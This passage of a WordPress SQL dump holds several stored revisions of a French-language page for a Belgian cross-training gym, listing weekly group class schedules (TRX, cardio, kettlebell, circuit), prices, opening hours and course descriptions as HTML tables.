0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:08:26', '2013-07-03 16:08:26', '', 11, 'http://www.crosstrainingcenter.be/?p=160', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(198, 1, '2013-07-03 17:41:28', '2013-07-03 17:41:28', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 45%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:41:28', '2013-07-03 17:41:28', '', 11, 'http://www.crosstrainingcenter.be/?p=198', 0, 'revision', '', 0),
(173, 1, '2013-07-03 16:42:38', '2013-07-03 16:42:38', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n<td>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:42:38', '2013-07-03 16:42:38', '', 11, 'http://www.crosstrainingcenter.be/?p=173', 0, 'revision', '', 0),
(166, 1, '2013-07-03 16:29:16', '2013-07-03 16:29:16', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">Lundi</td>\r\n<td class=\"ttitre\">Mardi</td>\r\n<td class=\"ttitre\">Mercredi</td>\r\n<td class=\"ttitre\">Jeudi</td>\r\n<td class=\"ttitre\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td 